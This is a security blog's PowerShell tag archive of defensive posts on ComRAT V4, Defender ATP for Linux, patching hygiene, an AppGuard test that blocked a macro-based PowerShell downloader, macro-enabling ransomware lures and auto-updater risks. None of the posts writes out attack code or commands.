Tag Archives: PowerShell

ComRAT V4 got an upgrade: On the value of Threat Intelligence

30 May 2020

Popular IT security media and threat intelligence services reported this week that the ComRAT V4 malware used by Turla APT got an upgrade. (1)(2)(3)

The big question for all businesses is: Do we have an increased risk resulting from this upgrade? Are the existing security controls still mitigating the risk stemmed from the ComRAT upgrade? Or do we have to upgrade our security controls as well.

The businesses in focus of the Turla APT should answer this question as soon as possible. Detailed information about the feature upgrade as well as the existing security controls are required to answer this question. This is nothing new. “If you know the enemy and know yourself, you need not fear the result of a hundred battles.” says Tzu Sun in the “Art of War” about 500 BC.

Are you prepared to answer this question? Your invest in threat intelligence is uneconomic if you cannot evaluate the threat details in the context of your environment.

What about ComRAT? The way command and control is performed changed. But the primary installation method has not changed: “ComRAT is typically installed via PowerStallion, a lightweight PowerShell backdoor used by Turla to install other backdoors.”(1)

PowerShell 5.0 Icon (5)

PowerShell 5.0 Icon. Picture Credits (5)

So, if you already implemented security controls, that deal with malware which uses PowerShell, your risk will not change. Otherwise, the publication “Securing PowerShell in the Enterprise” (4) of the Australian Cyber Security Center is a good starting point for a systematic approach to PowerShell security.

My advice: Disable PowerShell on all standard user computers. For administrative purposes, use hardened systems without email and internet access and implement PowerShell Endpoints.

Have a great Weekend.

References

  1. Lakshmanan R. New ComRAT Malware Uses Gmail to Receive Commands and Exfiltrate Data [Internet]. The Hacker News. 2020 [zitiert 28. Mai 2020]. Verfügbar unter: https://thehackernews.com/2020/05/gmail-malware-hacker.html

  2. Robinson T. Turla’s ComRAT v4 uses Gmail web UI to receive commands, steal data [Internet]. SC Media. 2020 [zitiert 30. Mai 2020]. Verfügbar unter: https://www.scmagazine.com/home/security-news/malware/turlas-comrat-v4-uses-gmail-web-ui-to-receive-commands-steal-data/

  3. Gatlan S. Russian cyberspies use Gmail to control updated ComRAT malware [Internet]. BleepingComputer. 2020 [zitiert 30. Mai 2020]. Verfügbar unter: https://www.bleepingcomputer.com/news/security/russian-cyberspies-use-gmail-to-control-updated-comrat-malware/

  4. Australian Cyber Security Center. Securing PowerShell in the Enterprise | Cyber.gov.au [Internet]. Australian Signals Directorate. 2019 [zitiert 6. März 2020]. Verfügbar unter: https://www.cyber.gov.au/publications/securing-powershell-in-the-enterprise

Picture credits

  1. PowerShell 5.0 Icon. Microsoft / Public domain. https://commons.wikimedia.org/wiki/File:PowerShell_5.0_icon.png

Microsoft previews Microsoft Defender ATP for Linux – No reason to celebrate!

7 March 2020

At the Ignite 2019 Microsoft announced that “Defender ATP is coming to Linux in 2020” (1). The preview version is available since the end of February (2).

To be clear, I think Microsoft Defender ATP is a good product. It benefits from millions of sensors installed on consumer and company computers. And, with the entire Defender suite installed, companies can gain a good security level.

COVID-19 Virus ultrastructural morphology

COVID-19 Virus ultrastructural morphology. Picture by CDC/ Alissa Eckert, MS; Dan Higgins, MAMS

Just to recap on why we need anti-malware products: We live in an operating system monoculture. Windows is everywhere, on the clients, on the servers, in the cloud. All windows systems are networked for reasons of efficiency. The drawback of all mononcultures is that they are vulnerable against diseases. Covid-19 is a current example in the real world, WannaCry and NotPetya are well known examples in cyber space.

Microsoft loves Linux, and starts implanting genes from the Windows DNA into the Linux DNA; the .Net framework, PowerShell, Windows Defender ATP. Since the cost pressure in IT is high, companies will start using this products.

Good for the EBIT, bad for cyber security. PowerShell for example is often used in malware attacks (3). It’s merely a matter of time before cyber attackers start leveraging PowerShell on Linux. Living off the Land attacks will work on Linux and Windows, in the worst case with no changes to the code. With that, Linux is getting vulnerable against attacks that were so far only known from Windows.

Especially for operators of critical infrastructures is a clear strategy for operating Microsoft products on Linux required to keep the risk from this cross-over at an acceptable level.

For advice in securing PowerShell see publication “Securing PowerShell in the Enterprise” of the Australian Cyber Security Center (4).

Have a great weekend!

References

  1. Tung L. Microsoft: Defender ATP is coming to Linux in 2020 [Internet]. ZDNet. 2019 [cited 2020 Mar 7]. Available from: https://www.zdnet.com/article/microsoft-defender-atp-is-coming-to-linux-in-2020/
  2. Vaughan-Nichols SJ. Microsoft previews Microsoft Defender ATP for Linux [Internet]. ZDNet. 2020 [cited 2020 Mar 7]. Available from: https://www.zdnet.com/article/microsoft-previews-microsoft-defender-atp-for-linux/
  3. Help Net Security. 91% of critical incidents involve known, legitimate binaries like PowerShell [Internet]. Help Net Security. 2018 [cited 2020 Mar 6]. Available from: https://www.helpnetsecurity.com/2018/06/28/incidents-legitimate-binaries/
  4. Australian Cyber Security Center. Securing PowerShell in the Enterprise | Cyber.gov.au [Internet]. Australian Signals Directorate. 2019 [cited 2020 Mar 6]. Available from: https://www.cyber.gov.au/publications/securing-powershell-in-the-enterprise

IBM Webinar: Force the Bad Guys to Use Zero Day Exploits with Continuous Endpoint Enforcement and Patching

22 October 2016

On Tuesday, I watched the IBM webinar ‘Force the Bad Guys to Use Zero Day Exploits with Continuous Endpoint Enforcement and Patching’.

On slide 3 one could read the really interesting statement ‘NSA: no zero days were used in any high profile breaches over last 24 months’.

Slide 3 - Force the Bad Guys to Use Zero Day Exploits — and Why That’s a Good Thing

Slide 3 – Force the Bad Guys to Use Zero Day Exploits — and Why That’s a Good Thing

Curtis Dukes, deputy national manager of security systems within the NSA, said that NSA has been involved in incident response or mitigation efforts for all ‘high profile incidents’ one has read about in the Washington Post or the New York times.

In all this incidents hacker used somewhat simple technology like spear phishing, water holing and USB-drive delivery to get onto the victim’s networks.

In the last 24 months, not one zero day has been used in these high profile intrusions.

That is a very interesting insight. Moreover, Curtis Dukes said that

The fundamental problem we faced in every one of those incidents was poor cyber hygiene.

The central idea of the webinar is to harden all systems by applying at least all existing patches to the known vulnerabilities, and in a timely manner. For most of the organizations this is a great challenge: Applying an endless stream of operating system and application patches to thousands of servers and endpoints is a never-ending nightmare. But essential to hinder an attacker, who managed to get on the network, in his lateral movement across the network.

If an attacker cannot exploit existing vulnerabilities, he is forced to install hacking tools from his C&C server. But this will increase the likelihood of detection because the attacker creates anomalies which can be detected e.g. by a current anti-malware solution or a well-tuned SIEM system.

It is important to recognize that cyber hygiene shall not be restricted to patching and password rules. Operating systems offer lots of powerful inbuilt tools, e.g. PowerShell, which can be used by an attacker to move laterally across the network. Such movements a much harder to detect, because they are very similar to standard user behavior. Pass-the-hash attacks are another example where patching is of limited value only.

It is very important to understand what threats a security solution mitigates. But it is of crucial importance to know the gaps and to have some ideas on how to deal with them effectively.

Have a good weekend.

AppGuard successfully protects against PowerShell based zero-day malware

9 July 2016

To get a feel for the impact AppGuard has on daily operations I worked mainly on my test system in the past weeks. My test system is a 6 years old Dell Inspiron 1445 with 4 GB of RAM and a 240 GB SSD.  The latest version of Windows 10 is deployed and all out-of-the-box Windows security options like Windows Defender and SmartScreen are activated.

I work with standard user rights; UAC is set to ‘Always notify me’. Macro protection for the office suite is set to ‘Disable all macros with notification’. AppGuard is installed on top of this security stack to protect from all kind of zero days.

The impact on my daily work is hardly noticeable. Standard malware is blocked either by Defender or by SmartScreen. Even the download of e.g. JavaScript based malware from malwr.com for test purposes is a challenging task.

AppGuard does a really good job in blocking the execution all kind of zero-day malware from user space. But how well works AppGuard in the case of somewhat more advanced malware?

I searched for a new PowerShell based malware on malwr.com and found Invoice_201604469.doc.

A check on VirusTotal showed that only 3 of 56 anti-malware products identified malware:

Antivirus Result Update
Fortinet WM/Poseket.A!tr.dldr 20160706
Qihoo-360 heur.macro.powershell.a 20160706
Symantec W97M.Downloader 20160706

As always, the AutoOpen macro is password protected. But LibreOffice overrides the password protection and reveals a master piece of code:

AutoOpen Macro with Powershell code

AutoOpen Macro with PowerShell Code

I opened the document and followed the instructions to execute the AutoOpen macro.

Invoice_201604469.doc

Invoice_201604469.doc. Click to enlarge.

The effect was enormous. AppGuard’s MemoryGuard blocked the execution of the PowerShell script and prevented the download of the payload 18293.exe:

Blocked Program Message

Blocked Program Message 1

Blocked Program Message

Blocked Program Message 2

Thus the command shell wasn’t able to start the payload and Windows displayed the last error message:

Windows Error Message

Windows Error Message

MemoryGuard is a really charming concept, and out-of-the-box available after installation.

This concludes my tests. The experiments of the past weeks show that User Space and MemoryGuard are useful security features. They complete the Windows built-in security features, and provide additional protection, in particular in the case of zero-day malware.

Have a good weekend.

Don’t ‘Enable Macro if you can’t read the entire document’!

9 April 2016

Since some weeks so-called file-less malware is experiencing a new boom. File-less malware is used in cyber-attacks for some years now. New is, that no executable is downloaded from a C&C server. Once the Trojan has become persistent it downloads a PowerShell script from the C&C server and uses PowerShell for encrypting the victim’s files.

PowerShell gives the attacker access to the Windows cryptographic functions. In this case, the AES standard is used. For more details, please see this analysis on malwr.com.

Actually, this is nothing new. Even the delivery method, in this case a spear phishing attack with a Word document, is well-known. And in the case that editing is deactivated for security reasons, the attacker provides concise instructions for activation:

PowerWare Ransomware Instructions to disable Macro Security

PowerWare Ransomware Instructions to disable Macro Security. Picture Credits: Carbonblack.com

The great challenge is to keep user awareness high. Hopefully this will prevent users to go ahead as follows:

Have a good weekend.

The Good and the Evil of Auto-Updaters

7 March 2015

This week I had a lot of delightful discussions with software developers during some security assessments.

Software development in very dynamic sectors thrives of rapid deployment of new functions and bug fixes. In particular in large IT organizations, the classic software rollout concept based on software packaging and distribution is often too slow to meet the needs of this users.

Often, developers try to solve this deployment challenge with auto-updaters. For the initial rollout classic software packaging and distribution is used. Once a bug fix or new function is regression tested a new version is build and pushed to the update server.

At every program startup the auto-updater checks the update server. If a newer program version is available the auto-updater installs them on the user’s computer and starts the new version.

This is a very charming concept. Users and developers love it, because it is fast and reliable. And help desk staff loves it because it ensures, that all users work with the same version.

Unfortunately auto-updaters are popular targets for attackers. For example, in the Home Depot data breach, which became public in November 2014, cyber criminals attacked the company’s software deployment system and deployed custom-built malware to point-of-sales devices.

It is very important that developers become aware of those attack vectors. Update servers, build servers, source control systems are very valuable targets for attackers. The mass rollout of malicious software is easy if an attacker gets access to a build or update server. And anti-malware or task virtualization software is largely useless because the attack is initiated by the end-user.

Spring is near

Spring is near

In my opinion it is very important that organizations secure their software development infrastructure and development processes, accompanied by regular security awareness trainings for developers. If possible enforce the Separation-of-Duties principle for all critical processes.

This is also true for the very popular PowerShell scripts which simplify the job of administrators. If an attacker injects some code in scripts which are used for administration of a company’s servers … Don’t panic!

That’s it for this week. Have a good weekend.